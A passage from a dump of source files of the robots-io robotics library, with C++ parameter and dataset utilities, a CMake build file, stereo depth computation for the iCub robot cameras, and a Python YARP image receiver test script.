Eigen::AngleAxisd axis_angle(data.transform.rotation());\n yarp::eigen::toEigen(tmp).segment<3>(3) = axis_angle.axis();\n yarp::eigen::toEigen(tmp)(6) = axis_angle.angle();\n\n yarp::eigen::toEigen(tmp).segment<3>(7) = data.linear_velocity;\n yarp::eigen::toEigen(tmp).tail<3>() = data.angular_velocity;\n\n return tmp;\n}\n\ntemplate <>\nyarp::sig::VectorOf<int> RobotsIO::Utils::YarpVectorOfProbe<int, cv::Rect>::convert_from(const cv::Rect& data)\n{\n /* Assume by default a top_left x, top_left right, width, height data. */\n yarp::sig::VectorOf<int> tmp(4);\n tmp(0) = data.x;\n tmp(1) = data.y;\n tmp(2) = data.width;\n tmp(3) = data.height;\n\n return tmp;\n}\n"
},
{
"alpha_fraction": 0.6604938507080078,
"alphanum_fraction": 0.6639232039451599,
"avg_line_length": 19.828571319580078,
"blob_id": "d179a33bf45bbce8d11c4a8bd7b520fb57dc49a4",
"content_id": "aa10c1380be6c9647e3d40ee57e42a1f31f0937d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1458,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 70,
"path": "/src/RobotsIO/src/Utils/Parameters.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/Parameters.h>\n\nusing namespace RobotsIO::Utils;\n\n#define robots_io_field_getter_impl(type) \\\n type Parameters::get_##type(const std::string& name) const \\\n { \\\n return type##_data_.at(name); \\\n } \\\n\n#define robots_io_std_field_getter_impl(type) \\\n std::type Parameters::get_##type(const std::string& name) const \\\n { \\\n return type##_data_.at(name); \\\n } \\\n\n#define robots_io_field_setter_impl(type) \\\n void Parameters::set_##type(const std::string& name, const type& value) \\\n { \\\n type##_data_[name] = value; \\\n } \\\n\n#define robots_io_std_field_setter_impl(type) \\\n void Parameters::set_##type(const std::string& name, const std::type& value) \\\n { \\\n type##_data_[name] = value; \\\n }\n\n\nrobots_io_std_field_getter_impl(string);\n\n\nrobots_io_std_field_getter_impl(size_t);\n\n\nrobots_io_field_getter_impl(double);\n\n\nrobots_io_field_getter_impl(int);\n\n\nrobots_io_field_getter_impl(bool);\n\n\nrobots_io_std_field_setter_impl(string);\n\n\nrobots_io_std_field_setter_impl(size_t);\n\n\nrobots_io_field_setter_impl(double);\n\n\nrobots_io_field_setter_impl(int);\n\n\nrobots_io_field_setter_impl(bool);\n\n\nconst Parameters* Parameters::parameters() const\n{\n return this;\n}\n"
},
{
"alpha_fraction": 0.6956862807273865,
"alphanum_fraction": 0.7011764645576477,
"avg_line_length": 23.519229888916016,
"blob_id": "d97f5f83c97b2e173647dd3919b5cc51ceb3232a",
"content_id": "45b6b77f202b5c775cc02bda6ce9ab2cf6bc8dd8",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1275,
"license_type": "permissive",
"max_line_length": 222,
"num_lines": 52,
"path": "/src/RobotsIO/src/Utils/DatasetSpatialVelocity.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/DatasetSpatialVelocity.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nDatasetSpatialVelocity::DatasetSpatialVelocity(const std::string& file_path, const std::size_t& skip_rows, const std::size_t& skip_cols, const std::size_t& expected_cols, const int rx_time_index, const int tx_time_index) :\n DatasetDataStream(file_path, skip_rows, skip_cols, expected_cols, rx_time_index, tx_time_index)\n{}\n\n\nDatasetSpatialVelocity::~DatasetSpatialVelocity()\n{}\n\n\ndouble DatasetSpatialVelocity::elapsed_time()\n{\n return elapsed_time_;\n}\n\n\nVectorXd DatasetSpatialVelocity::twist()\n{\n return twist_;\n}\n\n\nbool DatasetSpatialVelocity::freeze(const bool blocking)\n{\n if (!DatasetDataStream::freeze())\n return false;\n\n /* Twist data. */\n twist_ = data();\n\n /* Elapsed time. */\n double rx_time = DatasetDataStream::rx_time();\n elapsed_time_ = 0.0;\n if (last_time_initialized_)\n elapsed_time_ = rx_time - last_time_;\n last_time_ = rx_time;\n last_time_initialized_ = true;\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.694915235042572,
"alphanum_fraction": 0.7014341354370117,
"avg_line_length": 18.174999237060547,
"blob_id": "0e774ac986bda6df4c85adcd1f572329c7f21314",
"content_id": "4c5fb117e046517562aaa47c21e69027fbb8f05f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 767,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 40,
"path": "/src/RobotsIO/include/RobotsIO/Utils/ClockedComponent.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_CLOCKEDCOMPONENT_H\n#define ROBOTSIO_CLOCKEDCOMPONENT_H\n\n#include <RobotsIO/Utils/Clock.h>\n\n#include <memory>\n\nnamespace RobotsIO {\n namespace Utils {\n class ClockedComponent;\n }\n}\n\nclass RobotsIO::Utils::ClockedComponent\n{\npublic:\n ClockedComponent();\n\n void start_count();\n\n double stop_count() const;\n\n Clock& clock();\n\n void replace_clock(std::shared_ptr<Clock> clock);\n\nprivate:\n std::shared_ptr<RobotsIO::Utils::Clock> clock_;\n\n double current_time_;\n};\n\n#endif /* ROBOTSIO_CLOCKEDCOMPONENT_H */\n"
},
{
"alpha_fraction": 0.6678303480148315,
"alphanum_fraction": 0.6695228815078735,
"avg_line_length": 33.25,
"blob_id": "f9321c74f0ad9e819586e9c0bc416a801cbc7334",
"content_id": "0146f1a0f25a895212bad7aa2d1317785759ea1e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 9453,
"license_type": "permissive",
"max_line_length": 131,
"num_lines": 276,
"path": "/src/RobotsIO/CMakeLists.txt",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "#===============================================================================\n#\n# Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n#\n# This software may be modified and distributed under the terms of the\n# BSD 3-Clause license. See the accompanying LICENSE file for details.\n#\n#===============================================================================\n\nset(LIBRARY_TARGET_NAME RobotsIO)\n\n# Eigen3\nfind_package(Eigen3 REQUIRED)\n\n# OpenCV\nfind_package(OpenCV REQUIRED)\n\nif (USE_SUPERIMPOSE)\n # SuperimposeMesh\n find_package(SuperimposeMesh 0.11.100 REQUIRED)\nendif()\n\nif (USE_YARP)\n find_package(YARP REQUIRED COMPONENTS\n cv\n dev\n eigen\n idl_tools\n os\n sig\n )\nendif()\n\nif (USE_ICUB)\n find_package(ICUB REQUIRED)\nendif()\n\n# Header files\nset(${LIBRARY_TARGET_NAME}_HDR_CAMERA\n include/RobotsIO/Camera/Camera.h\n include/RobotsIO/Camera/CameraDeprojectionMatrix.h\n include/RobotsIO/Camera/CameraParameters.h\n include/RobotsIO/Camera/DatasetCamera.h\n include/RobotsIO/Camera/DatasetParameters.h\n)\n\nset(${LIBRARY_TARGET_NAME}_HDR_HAND \"\")\n\nset(${LIBRARY_TARGET_NAME}_HDR_UTILS\n include/RobotsIO/Utils/Clock.h\n include/RobotsIO/Utils/ClockedComponent.h\n include/RobotsIO/Utils/Data.h\n include/RobotsIO/Utils/DataStream.h\n include/RobotsIO/Utils/DatasetDataStream.h\n include/RobotsIO/Utils/DatasetDataStreamDelayed.h\n include/RobotsIO/Utils/DatasetSpatialVelocity.h\n include/RobotsIO/Utils/DatasetTransform.h\n include/RobotsIO/Utils/DatasetTransformDelayed.h\n include/RobotsIO/Utils/DepthToFile.h\n include/RobotsIO/Utils/FileToDepth.h\n include/RobotsIO/Utils/FileToEigen.h\n include/RobotsIO/Utils/FloatMatrix.h\n include/RobotsIO/Utils/ImageFileProbe.h\n include/RobotsIO/Utils/Parameters.h\n include/RobotsIO/Utils/ParametersExtractor.h\n include/RobotsIO/Utils/ParametersFiller.h\n include/RobotsIO/Utils/Probe.h\n include/RobotsIO/Utils/ProbeContainer.h\n include/RobotsIO/Utils/Segmentation.h\n include/RobotsIO/Utils/SpatialVelocity.h\n include/RobotsIO/Utils/SpatialVelocityBuffer.h\n include/RobotsIO/Utils/Transform.h\n include/RobotsIO/Utils/TransformWithVelocity.h\n include/RobotsIO/Utils/any.h\n)\n\n\n# Source files\nset(${LIBRARY_TARGET_NAME}_SRC_CAMERA\n src/Camera/Camera.cpp\n src/Camera/CameraDeprojectionMatrix.cpp\n src/Camera/CameraParameters.cpp\n src/Camera/DatasetCamera.cpp\n src/Camera/DatasetParameters.cpp\n)\n\nset(${LIBRARY_TARGET_NAME}_SRC_HAND \"\")\n\nset(${LIBRARY_TARGET_NAME}_SRC_UTILS\n src/Utils/Clock.cpp\n src/Utils/ClockedComponent.cpp\n src/Utils/DataStream.cpp\n src/Utils/DatasetDataStream.cpp\n src/Utils/DatasetDataStreamDelayed.cpp\n src/Utils/DatasetSpatialVelocity.cpp\n src/Utils/DatasetTransform.cpp\n src/Utils/DatasetTransformDelayed.cpp\n src/Utils/DepthToFile.cpp\n src/Utils/FileToDepth.cpp\n src/Utils/FileToEigen.cpp\n src/Utils/FloatMatrix.cpp\n src/Utils/ImageFileProbe.cpp\n src/Utils/Parameters.cpp\n src/Utils/ParametersExtractor.cpp\n src/Utils/Probe.cpp\n src/Utils/ProbeContainer.cpp\n src/Utils/Segmentation.cpp\n src/Utils/SpatialVelocity.cpp\n src/Utils/SpatialVelocityBuffer.cpp\n src/Utils/Transform.cpp\n src/Utils/TransformWithVelocity.cpp\n )\n\nif (USE_SUPERIMPOSE)\n list(APPEND ${LIBRARY_TARGET_NAME}_HDR_CAMERA\n include/RobotsIO/Camera/SegmentationCamera.h\n )\n\n list(APPEND ${LIBRARY_TARGET_NAME}_SRC_CAMERA\n src/Camera/SegmentationCamera.cpp\n )\nendif()\n\nif (USE_YARP)\n message(${CMAKE_SOURCE_DIR}/src/RobotsIO)\n yarp_idl_to_dir(INPUT_FILES thrift/yarp_image_mono_float.thrift\n OUTPUT_DIR ${CMAKE_SOURCE_DIR}/src/RobotsIO/\n PLACEMENT SEPARATE\n )\n\n list(APPEND ${LIBRARY_TARGET_NAME}_HDR_CAMERA\n include/RobotsIO/Camera/RealsenseCameraYarp.h\n include/RobotsIO/Camera/YarpCamera.h\n )\n\n list(APPEND ${LIBRARY_TARGET_NAME}_HDR_UTILS\n include/RobotsIO/Utils/ClockYarp.h\n include/RobotsIO/Utils/FloatMatrixYarpPort.h\n include/RobotsIO/Utils/Parameters2YarpBottle.h\n include/RobotsIO/Utils/ParametersYarpPort.h\n include/RobotsIO/Utils/SegmentationYarpPort.h\n include/RobotsIO/Utils/SpatialVelocityYarpPort.h\n include/RobotsIO/Utils/TransformYarpTransformClient.h\n include/RobotsIO/Utils/TransformWithVelocityYarpPort.h\n include/RobotsIO/Utils/TransformYarpPort.h\n include/RobotsIO/Utils/YarpBottleProbe.hpp\n include/RobotsIO/Utils/YarpBufferedPort.hpp\n include/RobotsIO/Utils/YarpImageOfProbe.hpp\n include/RobotsIO/Utils/YarpVectorOfProbe.hpp\n # This is generated by yarp_idl_to_dir\n include/RobotsIO/Utils/YarpImageOfMonoFloat.h\n )\n\n list(APPEND ${LIBRARY_TARGET_NAME}_SRC_UTILS\n src/Utils/ClockYarp.cpp\n src/Utils/FloatMatrixYarpPort.cpp\n src/Utils/Parameters2YarpBottle.cpp\n src/Utils/ParametersYarpPort.cpp\n src/Utils/SegmentationYarpPort.cpp\n src/Utils/SpatialVelocityYarpPort.cpp\n src/Utils/TransformYarpTransformClient.cpp\n src/Utils/TransformWithVelocityYarpPort.cpp\n src/Utils/TransformYarpPort.cpp\n src/Utils/YarpBottleProbe.cpp\n src/Utils/YarpVectorOfProbe.cpp\n # This is generated by yarp_idl_to_dir\n src/RobotsIO/Utils/YarpImageOfMonoFloat.cpp\n )\n\n list(APPEND ${LIBRARY_TARGET_NAME}_SRC_CAMERA\n src/Camera/YarpCamera.cpp\n src/Camera/RealsenseCameraYarp.cpp\n )\nendif()\n\nif (USE_YARP AND USE_ICUB)\n list(APPEND ${LIBRARY_TARGET_NAME}_HDR_CAMERA\n include/RobotsIO/Camera/iCubCamera.h\n include/RobotsIO/Camera/iCubCameraDepth.h\n include/RobotsIO/Camera/iCubCameraRelative.h\n )\n\n list(APPEND ${LIBRARY_TARGET_NAME}_HDR_HAND\n include/RobotsIO/Hand/iCubHand.h\n )\n\n list(APPEND ${LIBRARY_TARGET_NAME}_SRC_CAMERA\n src/Camera/iCubCamera.cpp\n src/Camera/iCubCameraDepth.cpp\n src/Camera/iCubCameraRelative.cpp\n )\n\n list(APPEND ${LIBRARY_TARGET_NAME}_SRC_HAND\n src/Hand/iCubHand.cpp\n )\n\n set(${LIBRARY_TARGET_NAME}_ICUBHAND_CONF config/Hand/icub_hand_configuration.ini.template)\n\nendif()\n\nset(${LIBRARY_TARGET_NAME}_HDR\n ${${LIBRARY_TARGET_NAME}_HDR_CAMERA}\n ${${LIBRARY_TARGET_NAME}_HDR_HAND}\n ${${LIBRARY_TARGET_NAME}_HDR_UTILS}\n)\n\nset(${LIBRARY_TARGET_NAME}_SRC\n ${${LIBRARY_TARGET_NAME}_SRC_CAMERA}\n ${${LIBRARY_TARGET_NAME}_SRC_HAND}\n ${${LIBRARY_TARGET_NAME}_SRC_UTILS}\n)\n\n# Add library\nadd_library(${LIBRARY_TARGET_NAME} ${${LIBRARY_TARGET_NAME}_SRC} ${${LIBRARY_TARGET_NAME}_HDR})\nadd_library(${PROJECT_NAME}::${LIBRARY_TARGET_NAME} ALIAS ${LIBRARY_TARGET_NAME})\n\n# Library properties\n# set_target_properties(${LIBRARY_TARGET_NAME} PROPERTIES VERSION ${${PROJECT_NAME}_VERSION}\n# PUBLIC_HEADER \"${${LIBRARY_TARGET_NAME}_HDR}\")\n\n# Include directories\ntarget_include_directories(${LIBRARY_TARGET_NAME} PUBLIC \"$<BUILD_INTERFACE:${CMAKE_CURRENT_SOURCE_DIR}/include>\"\n \"$<INSTALL_INTERFACE:$<INSTALL_PREFIX>/${CMAKE_INSTALL_INCLUDEDIR}>\")\n\n# Linker configuration\ntarget_link_libraries(${LIBRARY_TARGET_NAME} PUBLIC Eigen3::Eigen ${OpenCV_LIBS})\n\nif (USE_JSONCPP)\n message(${JSONCPP_LIBRARIES})\n target_link_libraries(${LIBRARY_TARGET_NAME} PUBLIC ${JSONCPP_LIBRARIES})\nendif()\n\nif (USE_YARP)\n target_link_libraries(${LIBRARY_TARGET_NAME} PUBLIC\n YARP::YARP_cv\n YARP::YARP_dev\n YARP::YARP_eigen\n YARP::YARP_init\n YARP::YARP_os\n YARP::YARP_sig\n )\nendif()\n\nif (USE_ICUB)\n target_link_libraries(${LIBRARY_TARGET_NAME} PRIVATE ICUB::iKin ICUB::learningMachine)\nendif()\n\nif (USE_SUPERIMPOSE)\n target_link_libraries(${LIBRARY_TARGET_NAME} PUBLIC SI::SuperimposeMesh)\nendif()\n\n# Specify installation targets, typology and destination folders.\ninstall(TARGETS ${LIBRARY_TARGET_NAME}\n EXPORT ${PROJECT_NAME}\n LIBRARY DESTINATION \"${CMAKE_INSTALL_LIBDIR}\" COMPONENT shlib\n ARCHIVE DESTINATION \"${CMAKE_INSTALL_LIBDIR}\" COMPONENT lib\n RUNTIME DESTINATION \"${CMAKE_INSTALL_BINDIR}\" COMPONENT bin\n # PUBLIC_HEADER DESTINATION \"${CMAKE_INSTALL_INCLUDEDIR}/${LIBRARY_TARGET_NAME}\" COMPONENT dev\n)\n\ninstall(FILES ${${LIBRARY_TARGET_NAME}_HDR_CAMERA}\n DESTINATION \"${CMAKE_INSTALL_INCLUDEDIR}/${LIBRARY_TARGET_NAME}/Camera\")\ninstall(FILES ${${LIBRARY_TARGET_NAME}_HDR_HAND}\n DESTINATION \"${CMAKE_INSTALL_INCLUDEDIR}/${LIBRARY_TARGET_NAME}/Hand\")\ninstall(FILES ${${LIBRARY_TARGET_NAME}_HDR_UTILS}\n DESTINATION \"${CMAKE_INSTALL_INCLUDEDIR}/${LIBRARY_TARGET_NAME}/Utils\")\n\nset_property(GLOBAL APPEND PROPERTY ${PROJECT_NAME}_TARGETS ${LIBRARY_TARGET_NAME})\n\nif (USE_YARP AND USE_ICUB)\n yarp_install(FILES ${${LIBRARY_TARGET_NAME}_ICUBHAND_CONF} DESTINATION ${ICUBCONTRIB_CONTEXTS_INSTALL_DIR}/robots_io_icub_hand)\nendif()\n\nif (BUILD_TESTING)\n add_subdirectory(test)\nendif()\n"
},
{
"alpha_fraction": 0.7097722291946411,
"alphanum_fraction": 0.7288758158683777,
"avg_line_length": 20.603174209594727,
"blob_id": "1ae1f09c82f4c7a2f77be13225297fcd810505d2",
"content_id": "7cae9b9cba1b055154705711ba132d99c96aba2f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1361,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 63,
"path": "/src/RobotsIO/src/Utils/Parameters2YarpBottle.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/Parameters2YarpBottle.h>\n\nusing namespace RobotsIO::Utils;\nusing namespace yarp::os;\n\n\nParameters2YarpBottle::Parameters2YarpBottle(const Parameters& parameters) :\n ParametersExtractor(parameters)\n{}\n\n\nParameters2YarpBottle::~Parameters2YarpBottle()\n{}\n\n\nBottle Parameters2YarpBottle::extract_to_bottle()\n{\n extract_fields();\n\n return bottle_;\n}\n\n\nvoid Parameters2YarpBottle::extract_field(const std::string& key, const std::string& value)\n{\n bottle_.addString(key);\n bottle_.addString(value);\n}\n\n\nvoid Parameters2YarpBottle::extract_field(const std::string& key, const std::size_t& value)\n{\n bottle_.addString(key);\n bottle_.addInt32(value);\n}\n\n\nvoid Parameters2YarpBottle::extract_field(const std::string& key, const int& value)\n{\n bottle_.addString(key);\n bottle_.addInt32(value);\n}\n\n\nvoid Parameters2YarpBottle::extract_field(const std::string& key, const double& value)\n{\n bottle_.addString(key);\n bottle_.addFloat64(value);\n}\n\n\nvoid Parameters2YarpBottle::extract_field(const std::string& key, const bool& value)\n{\n bottle_.addString(key);\n bottle_.addInt32(value ? 1 : 0);\n}\n"
},
{
"alpha_fraction": 0.5953947305679321,
"alphanum_fraction": 0.6191259622573853,
"avg_line_length": 33.32258224487305,
"blob_id": "26d4dd08190b895c0527d5f6f02a2af33ecf4368",
"content_id": "8fa1ca3bf3b2c2c091dab1d50de4ebecd834546c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8512,
"license_type": "permissive",
"max_line_length": 277,
"num_lines": 248,
"path": "/src/RobotsIO/src/Camera/iCubCameraDepth.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n// #ifdef _OPENMP\n// #include <omp.h>\n// #endif\n\n#include <RobotsIO/Camera/iCubCameraDepth.h>\n\n#include <limits>\n#include <opencv2/calib3d.hpp>\n#include <opencv2/core/eigen.hpp>\n#include <opencv2/imgproc.hpp>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Camera;\n\n\niCubCameraDepth::iCubCameraDepth\n(\n const std::string& robot_name,\n const std::string& port_prefix,\n const bool& use_calibration,\n const std::string& calibration_path\n) :\n iCubCameraRelative(robot_name, port_prefix, use_calibration, calibration_path)\n{\n configure_sgbm();\n}\n\n\niCubCameraDepth::iCubCameraDepth\n(\n const std::string& data_path_left,\n const std::string& data_path_right,\n const std::size_t& width,\n const std::size_t& height,\n const double& fx_l,\n const double& cx_l,\n const double& fy_l,\n const double& cy_l,\n const double& fx_r,\n const double& cx_r,\n const double& fy_r,\n const double& cy_r,\n const bool& load_encoders_data,\n const bool& use_calibration,\n const std::string& calibration_path\n) :\n iCubCameraRelative(data_path_left, data_path_right, width, height, fx_l, cx_l, fy_l, cy_l, fx_r, cx_r, fy_r, cy_r, load_encoders_data, use_calibration, calibration_path)\n{\n configure_sgbm();\n}\n\n\niCubCameraDepth::~iCubCameraDepth()\n{}\n\n\nstd::pair<bool, Eigen::MatrixXd> iCubCameraDepth::deprojection_matrix() const\n{\n /* Since the depth is aligned with left camera, the left camera parameters are returned here. */\n return get_relative_camera().deprojection_matrix();\n}\n\n\nstd::pair<bool, Eigen::MatrixXf> iCubCameraDepth::depth(const bool& blocking)\n{\n /* Get the images. */\n bool valid_rgb = false;\n cv::Mat rgb_left;\n cv::Mat rgb_right;\n std::tie(valid_rgb, rgb_left) = get_relative_camera().rgb(blocking);\n if (!valid_rgb)\n return std::make_pair(false, MatrixXf());\n\n valid_rgb = false;\n std::tie(valid_rgb, rgb_right) = iCubCameraRelative::rgb(blocking);\n if (!valid_rgb)\n return std::make_pair(false, MatrixXf());\n\n /* Get the extrinsic matrix. */\n bool valid_pose = false;\n Transform<double, 3, Affine> pose;\n std::tie(valid_pose, pose) = iCubCameraRelative::pose(blocking);\n if (!valid_pose)\n return std::make_pair(false, MatrixXf());\n /* As required by SGBM. */\n pose = pose.inverse();\n\n /* Set the extrinsic matrix in OpenCV format. */\n MatrixXd translation = pose.translation();\n cv::Mat R;\n cv::Mat t;\n cv::eigen2cv(translation, t);\n cv::eigen2cv(pose.rotation(), R);\n\n /* Perform rectification. */\n cv::Mat R1;\n cv::Mat R2;\n cv::Mat P1;\n cv::Mat P2;\n cv::Mat Q;\n cv::stereoRectify(intrinsic_left_, distortion_left_,\n intrinsic_right_, distortion_right_,\n rgb_left.size(),\n R, t,\n R1, R2, P1, P2, Q, -1);\n\n cv::Mat mapl0;\n cv::Mat mapl1;\n cv::Mat mapr0;\n cv::Mat mapr1;\n cv::initUndistortRectifyMap(intrinsic_left_, distortion_left_, R1, P1, rgb_left.size(), CV_32FC1, mapl0, mapl1);\n cv::initUndistortRectifyMap(intrinsic_right_, distortion_right_, R2, P2, rgb_left.size(), CV_32FC1, mapr0, mapr1);\n\n cv::Mat rgb_left_rect;\n cv::Mat rgb_right_rect;\n cv::remap(rgb_left, rgb_left_rect, mapl0, mapl1, cv::INTER_LINEAR);\n cv::remap(rgb_right, rgb_right_rect, mapr0, mapr1, cv::INTER_LINEAR);\n\n /* Compute disparity. */\n cv::Mat disparity;\n sgbm_->compute(rgb_left_rect, rgb_right_rect, disparity);\n\n /* Compute mapping from coordinates in the original left image to coordinates in the rectified left image. */\n cv::Mat map(disparity.rows * disparity.cols, 1, CV_32FC2);\n for (int v = 0; v < disparity.rows; v++)\n {\n for (int u = 0; u < disparity.cols; u++)\n {\n map.ptr<float>(v * disparity.cols + u)[0] = float(u);\n map.ptr<float>(v * disparity.cols + u)[1] = float(v);\n }\n }\n cv::undistortPoints(map, map, intrinsic_left_, distortion_left_, R1, P1);\n\n /* Store some values required for the next computation. */\n float q_00 = float(Q.at<double>(0, 0));\n float q_03 = float(Q.at<double>(0, 3));\n float q_11 = float(Q.at<double>(1, 1));\n float q_13 = float(Q.at<double>(1, 3));\n float q_23 = float(Q.at<double>(2, 3));\n float q_32 = float(Q.at<double>(3, 2));\n float q_33 = float(Q.at<double>(3, 3));\n float r_02 = float(R1.at<double>(0, 2));\n float r_12 = float(R1.at<double>(1, 2));\n float r_22 = float(R1.at<double>(2, 2));\n\n /* Compute depth. */\n MatrixXf depth(rgb_left.rows, rgb_left.cols);\n// #pragma omp parallel for collapse(2)\n for (int v = 0; v < rgb_left.rows; v++)\n for (int u = 0; u < rgb_left.cols; u++)\n {\n /* Take coordinates in the rectified image. */\n float u_map = map.ptr<float>(v * disparity.cols + u)[0];\n float v_map = map.ptr<float>(v * disparity.cols + u)[1];\n\n /* Convert to int. */\n int u_r = cvRound(u_map);\n int v_r = cvRound(v_map);\n\n if ((u_r < 0) || (u_r >= disparity.cols) || (v_r < 0) || ( v_r >= disparity.rows))\n {\n depth(v, u) = std::numeric_limits<double>::infinity();\n continue;\n }\n\n /* Get disparity. */\n float disparity_value = disparity.at<short>(v_r, u_r) / 16.0;\n\n /* Evaluate depth. */\n depth(v, u) = (r_02 * (float(u_r) * q_00 + q_03) + r_12 * (float(v_r) * q_11 + q_13) + r_22 * q_23) / (disparity_value * q_32 + q_33);\n }\n\n return std::make_pair(true, depth);\n}\n\n\nstd::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> iCubCameraDepth::pose(const bool& blocking)\n{\n /* Since the depth is aligned with left camera, the left camera pose is returned here. */\n return get_relative_camera().pose(blocking);\n}\n\n\nstd::pair<bool, cv::Mat> iCubCameraDepth::rgb(const bool& blocking)\n{\n /* Since the depth is aligned with left camera, the left image is returned here. */\n return get_relative_camera().rgb(blocking);\n}\n\n\nvoid iCubCameraDepth::configure_sgbm()\n{\n /* Get intrinsic parameters of both cameras .*/\n bool valid_parameters = false;\n CameraParameters parameters_left;\n std::tie(valid_parameters, parameters_left) = get_relative_camera().parameters();\n if (!valid_parameters)\n {\n throw(std::runtime_error(log_name_ + \"::configure_sgbm. Error: cannot get intrinsic parameters of left camera.\"));\n }\n\n valid_parameters = false;\n CameraParameters parameters_right;\n std::tie(valid_parameters, parameters_right) = parameters();\n if (!valid_parameters)\n {\n throw(std::runtime_error(log_name_ + \"::configure_sgbm. Error: cannot get intrinsic parameters of right camera.\"));\n }\n\n /* Configure intrinsics for OpenCV. */\n\n intrinsic_left_ = cv::Mat::eye(3,3,CV_64FC1);\n intrinsic_left_.at<double>(0,0) = parameters_left.fx();\n intrinsic_left_.at<double>(0,2) = parameters_left.cx();\n intrinsic_left_.at<double>(1,1) = parameters_left.fy();\n intrinsic_left_.at<double>(1,2) = parameters_left.cy();\n\n intrinsic_right_ = cv::Mat::eye(3,3,CV_64FC1);\n intrinsic_right_.at<double>(0,0) = parameters_right.fx();\n intrinsic_right_.at<double>(0,2) = parameters_right.cx();\n intrinsic_right_.at<double>(1,1) = parameters_right.fy();\n intrinsic_right_.at<double>(1,2) = parameters_right.cy();\n\n /* Configure distortion for OpenCV.\n We expect that the images are already undistorted. */\n distortion_left_ = cv::Mat::zeros(1,8,CV_64FC1);\n distortion_left_.at<double>(0,0) = 0.0;\n distortion_left_.at<double>(0,1) = 0.0;\n distortion_left_.at<double>(0,2) = 0.0;\n distortion_left_.at<double>(0,3) = 0.0;\n\n distortion_right_ = cv::Mat::zeros(1,8,CV_64FC1);\n distortion_right_.at<double>(0,0) = 0.0;\n distortion_right_.at<double>(0,1) = 0.0;\n distortion_right_.at<double>(0,2) = 0.0;\n distortion_right_.at<double>(0,3) = 0.0;\n\n /* Initialize OpenCV SGBM. */\n sgbm_ = cv::StereoSGBM::create(min_disparity_, number_of_disparities_, block_size_, 8 * 3 * block_size_ * block_size_, 32 * 3 * block_size_ * block_size_, disp_12_max_diff_, pre_filter_cap_, uniqueness_ratio_, speckle_window_size_, speckle_range_, cv::StereoSGBM::MODE_HH);\n}\n"
},
{
"alpha_fraction": 0.6205357313156128,
"alphanum_fraction": 0.6281887888908386,
"avg_line_length": 28.58490562438965,
"blob_id": "55fdb0d6a8dd948f85d9dfaca63a499f3a92e76c",
"content_id": "f68b061921a1f32df159888d76a8de58a16e3b9c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1568,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 53,
"path": "/src/RobotsIO/test/Utils/YarpImageOfMonoFloat/receiver.py",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy\nimport robotsio\nimport struct\nimport yarp\n\n\ndef main():\n\n yarp.Network.init()\n\n images_in = robotsio.BufferedPortYarpImageOfMonoFloat()\n images_in.open('/hyperpcr/depth:i')\n\n width = # set width here\n height = # set height here\n\n depth_buffer = bytearray(numpy.zeros((height, width, 1), dtype = numpy.float32))\n depth_image = yarp.ImageFloat()\n depth_image.resize(width, height)\n depth_image.setExternal(depth_buffer, width, height)\n\n mask_buffer = bytearray(numpy.zeros((height, width, 1), dtype = numpy.uint8))\n mask_image = yarp.ImageMono()\n mask_image.resize(width, height)\n mask_image.setExternal(mask_buffer, width, height)\n\n images_data = None\n while images_data is None:\n images_data = images_in.read(False)\n\n if images_data is not None:\n mask_image.copy(images_data.image_mono)\n depth_image.copy(images_data.image_float)\n\n depth_frame = numpy.frombuffer(depth_buffer, dtype=numpy.float32).reshape(height, width)\n mask_frame = numpy.frombuffer(mask_buffer, dtype=numpy.uint8).reshape(height, width)\n\n # save\n cv2.imwrite('./mask.png', mask_frame)\n\n depth_file = open('depth.float', \"wb\")\n depth_file.write(struct.pack('=Q', width))\n depth_file.write(struct.pack('=Q', height))\n 